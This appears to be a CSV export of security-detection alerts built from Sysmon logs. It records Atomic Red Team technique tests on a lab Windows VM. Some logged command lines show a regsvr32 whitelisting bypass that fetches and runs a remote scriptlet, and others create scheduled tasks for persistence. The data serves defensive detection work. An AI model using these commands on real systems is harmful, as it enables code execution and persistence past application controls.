+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4038
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:44.049
+ 747F3D96-D978-5D31-0000-0010EB313800
+ 2076
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D978-5D31-0000-0010442F3800
+ 2832
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4038
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:44.049
+ 747F3D96-D978-5D31-0000-0010EB313800
+ 2076
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D978-5D31-0000-0010442F3800
+ 2832
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4037
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:44.010
+ 747F3D96-D978-5D31-0000-0010442F3800
+ 2832
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4037
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:44.010
+ 747F3D96-D978-5D31-0000-0010442F3800
+ 2832
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4036
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:43.460
+ 747F3D96-D977-5D31-0000-0010771B3800
+ 1476
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4035
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:43.339
+ 747F3D96-D977-5D31-0000-00100A0E3800
+ 3848
+ C:\Windows\System32\calc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\calc.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
+ 747F3D96-D976-5D31-0000-001093EA3700
+ 2332
+ C:\Windows\System32\regsvr32.exe
+ regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4033
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.834
+ 747F3D96-D976-5D31-0000-001093EA3700
+ 2332
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D976-5D31-0000-001041E83700
+ 4444
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4033
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.834
+ 747F3D96-D976-5D31-0000-001093EA3700
+ 2332
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D976-5D31-0000-001041E83700
+ 4444
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4033
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.834
+ 747F3D96-D976-5D31-0000-001093EA3700
+ 2332
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D976-5D31-0000-001041E83700
+ 4444
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4032
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.803
+ 747F3D96-D976-5D31-0000-001041E83700
+ 4444
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4032
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.803
+ 747F3D96-D976-5D31-0000-001041E83700
+ 4444
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4031
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.384
+ 747F3D96-D976-5D31-0000-0010D8D53700
+ 6312
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4029
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.259
+ 747F3D96-D976-5D31-0000-0010DBCC3700
+ 6292
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "arp -a"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4028
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:42.051
+ 747F3D96-D976-5D31-0000-00104AC63700
+ 6412
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4088
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.531
+ 747F3D96-DA6A-5D31-0000-001025AD3E00
+ 4552
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4086
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence - Scheduled Task Management
+ 2019-07-19 14:57:46.443
+ 747F3D96-DA6A-5D31-0000-0010C4A83E00
+ 1408
+ C:\Windows\System32\schtasks.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Task Scheduler Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
+ 747F3D96-DA6A-5D31-0000-001072A63E00
+ 4276
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4085
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.411
+ 747F3D96-DA6A-5D31-0000-001072A63E00
+ 4276
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4084
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.174
+ 747F3D96-DA6A-5D31-0000-0010C09D3E00
+ 3224
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4082
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.051
+ 747F3D96-DA6A-5D31-0000-0010B2953E00
+ 5036
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
